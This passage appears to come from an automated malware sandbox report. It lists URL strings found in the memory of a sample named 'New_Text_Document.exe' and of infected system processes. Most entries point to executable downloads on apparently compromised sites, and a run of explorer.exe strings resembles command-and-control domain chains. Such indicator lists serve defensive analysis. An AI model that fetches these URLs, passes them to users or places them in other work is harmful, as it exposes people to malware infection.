                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://studiocamposdesign.com/mvps/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.clz.kr/soft_hair/PCSupport.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://syedahmad.me/llmt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tbmcoats.com/55aa5e.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tbmcoats.com/BR.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://techniguitare.com/forum/vjAk1CX/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://temptmag.com/private_array/corporate_forum/HhlND_ymf9vwyKx/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://temptmag.com/private_array/form/rxebzllhn-956/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://thedoctorsgym.net/10/data64_1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://thelocationgold.com/cuu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiemvangngoctham.com/wp-content/jkNQKmmMlZi/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://travelwithmanta.co.za/r6x7x6rf.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://troubletorn.ydns.eu/x/qazsaw/Msvsrlgkmzkynw.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://troubletorn.ydns.eu/x/qazsaw/Owpxkxlhneicvr.scr
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://troubletorn.ydns.eu/x/qazsaw/akjnagosfmwanr.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unicorpbrunei.com/Products/Siplast/_vti_cnf/_vti_cnf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unicorpbrunei.com/Products/Wattyl/IMAGES/_VTI_CNF/_VTI_CNF.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unicorpbrunei.com/Products/Wattyl/Wattyl.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unicorpbrunei.com/Products/pacific_polymers/images/images.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://update.itopvpn.com/dl/idr/v3/Pub/idrB5Event.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://updates.ultimate-fakkers.co.network/upd/LoaderAVX.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://urlhaus.abuse.ch
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vfocus.net/download/down/cmdbind2.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vmi1159541.contaboserver.net/RobluxCoins.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vmi1159541.contaboserver.net/asas.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vmi1159541.contaboserver.net/elevator.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vvitcher.ru/0.dotm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://websound.ru/issues/136_140/flt_shovemydiscoupyourarse.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://websound.ru/issues/136_140/kb%5Efr_ouverture.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://websound.ru/issues/146_150/bc_memories_from_the_mcp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whitecatcorn.com
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://windcomtechnologies.com/wizzymax
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wisewomanwarrior.com/wp-admin/g1.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wispafoods.com/BestSoftware.exe
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bakepreneurs.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bakepreneurs.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bakepreneurs.com/4hc5/www.quailrun-inc.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bakepreneurs.comReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bepnuclasechia.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bepnuclasechia.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bepnuclasechia.com/4hc5/www.loadtransfer.site
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bepnuclasechia.comReferer:
                    Source: svchost.exe, 00000006.00000002.1380547033.0000020CEEA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chawkyfrenn.com/icon/BzGzSWFZIZGaTK/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chawkyfrenn.com/icon/JtT/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chawkyfrenn.com/icon/LRWYSefRL7/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checktrace.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checktrace.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checktrace.com/4hc5/www.imaswe.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.checktrace.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chemsky.tn/64prPlDhbugztyb2Zl/xjvFXPUX7XeoPWTqSQ2/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collibrishop.online
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collibrishop.online/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collibrishop.online/4hc5/www.lpqxmz.site
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.collibrishop.onlineReferer:
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.completetip.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.completetip.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.completetip.com/sy22/www.sarthaksrishticreation.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.completetip.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dacui.online/download/update/%E9%80%A0%E5%B0%8F%E4%BA%BA.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dental.xiaoxiao.media/css/http:/OCT/SVAJ01CBXvj8Ax/
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fourseasonslb.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fourseasonslb.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fourseasonslb.com/sy22/www.gracefullytouchedartistry.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fourseasonslb.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.geovanisantos.adv.br/wp-admin/pl/plg/Plugin_1.plg
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gracefullytouchedartistry.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gracefullytouchedartistry.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gracefullytouchedartistry.com/sy22/www.zhperviepixie.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gracefullytouchedartistry.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hebgb.top/study/DetectionCurriculum.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hseda.com/download/qt51crk.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imaswe.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imaswe.com/4hc5/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imaswe.com/4hc5/www.bepnuclasechia.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imaswe.comReferer:
